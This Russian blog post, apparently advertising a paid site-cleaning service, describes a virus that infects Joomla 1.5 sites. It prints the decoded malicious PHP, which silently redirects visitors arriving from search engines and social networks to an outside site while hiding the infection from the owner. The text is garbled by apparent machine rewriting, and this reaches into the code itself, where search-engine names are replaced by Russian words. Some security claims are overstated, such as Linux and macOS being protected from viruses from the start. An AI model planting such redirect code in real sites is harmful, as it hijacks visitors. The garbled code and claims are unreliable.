Лечение сайта от вирусов с помощью скрипта Айболит

Опубликовано: 26.03.2017

видео Лечение сайта от вирусов с помощью скрипта Айболит

вирус на сайте, блоге? как убрать вирус с сайта - ЛЕГКО!

Итак, что все-таки отвратительного и небезопасного может быть в вирусе? Разберем пользующийся популярностью на сегодня вирус, который просто и стремительно заражает веб-сайты на Joomla 1.5. В файловой системе он, нак и подавляющее большая часть закодирован, имеет особенность заражать не только лишь индексные файлы, да и другие, которые исполняются. К примеру, файлы Виртуемарта.


Лечение сайта от вирусов с помощью скрипта Айболит

В расшифрованном виде он смотрится приблизительно так:

 Код вирусаerror_reporting();0 $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"яху") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/Гугл\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://costabrava.bee.pl/"); exit(); } } }

Если вы не имеете достаточных познаний в php, чтоб расшифровать приведенный выше код, объясню.

Вирус определяет тип клиента, и в этом случае, если это браузер (таким макаром он осознает, что на веб-сайт попал живой человек, а не бот), ставит хитрое условие: если человек попадает на веб-сайт  из поисковой машины, или кликнув на контекстную ссылку в Яндекс-директе либо Гугл-адсенсе, если он попадает на веб-сайт, перейдя по ссылке из соц сетей, или сервисов маленьких url и т.д., то веб-сайт редиректится на (в этом случае) http://costabrava.bee.pl/.

В этом случае, если человек пришел на веб-сайт набрав его URL в адресной строке браузера либо надавил на ссылку с хоть какого другого веб-сайта (к примеру, с моего), то скрипт не срабатывает и человек лицезреет мотивированную страничку. Другими словами, видите ли, изготовлено все, чтоб владелец либо администратор веб-сайта очень длительно не мог увидеть что веб-сайт заражен вирусом (не будет же он сам щелкать по собственной ссылке в директе). 

Зачем это изготовлено? Как вариант — темная раскрутка какого-либо бренда. К примеру, создается временный веб-сайт в сервисе бесплатного хостинга www.bee.pl с запоминающимся логотипом, заражается миллион веб-сайтов. Люди лицезреют этот логотип. А позже просто лицезрев логотип на улице, они задумываются, что это раскрученная торговая марка, которой можно и довериться. 

Очередной вариант — редирект на страничку с трояном, который заразит ваш windows-компьютер. Троян же может просто и стремительно украсть все пароли, которые есть у вас на компьютере, все адреса почты. Все, вы в базе. Не успеете вы почистить компьютер от вирусов, как все ваши пароли и адреса из почтового клиента будут находиться в руках у взломщиков. Позже не спрашивайте как могли взломать вашу страничку в Одноклассниках, если у вас мега-пароль из 20 букв перемешанных с цифрами.

Итак, для чего необходимы вредные коды на веб-сайтах мы разобрались. Как убрать вирус с веб-сайта? Вариантов масса, какой-то из них я обрисовал в самом начале поста. Остальное будем считать коммерческой потаенной моих спонсоров. В конце концов, 2000 рублей для коммерческой организации — это не средства. Если не убрать вирус с веб-сайта, вы сможете утратить еще больше.

Как обезопасить себя от инфецирования веб-сайта вирусами в предстоящем? Ответ прост: часто обновляйте свои CMS. К примеру, вирус, который был описан выше просто пробивает защиту Joomla 1.5.25 и не может заразить Joomla 2.5.3. Не используйте операционную систему Windows, так как она более слаба в плане инфецирования вирусами. Используйте Mac OS X, а если нет средств, то перебегайте на бесплатные Linux, Ubuntu, FreeBSD... Словом, те операционки, которые вначале защищены от вирусни.

Да, обновление системы управления веб-сайтом и операционной системы — это трудно. Да, много компонент для 2.5 еще не выдумано. Зато выдуманы вирусы под  Joomla 1.5.25, а версии Joomla 1.5.26, по словам разработчиков не будет; выдуманы вирусы для Windows и эта неувязка не отважится, по-моему, никогда. В конце концов, составляющие, если они очень важны, можно создать без помощи других либо заказать их разработку в IT-компании.

Кроме обновления CMS, я бы еще порекомендовал установить компонент Eyesite, который выслеживает конфигурации в файлах и предупреждает о таких по почте. На этом все. Надеюсь, эта статья принесла вам, моим читателям, столько же полезности, сколько и моим спонсорам.

Не забываем:

Для заказа услуги очистки веб-сайта от вирусов, позвоните по телефонам (495) 410-98-08 либо (499) 755-90-52. Так же вы сможете выслать заявку по почте millor.ru(@)gmail.com (уберите скобки). 

rss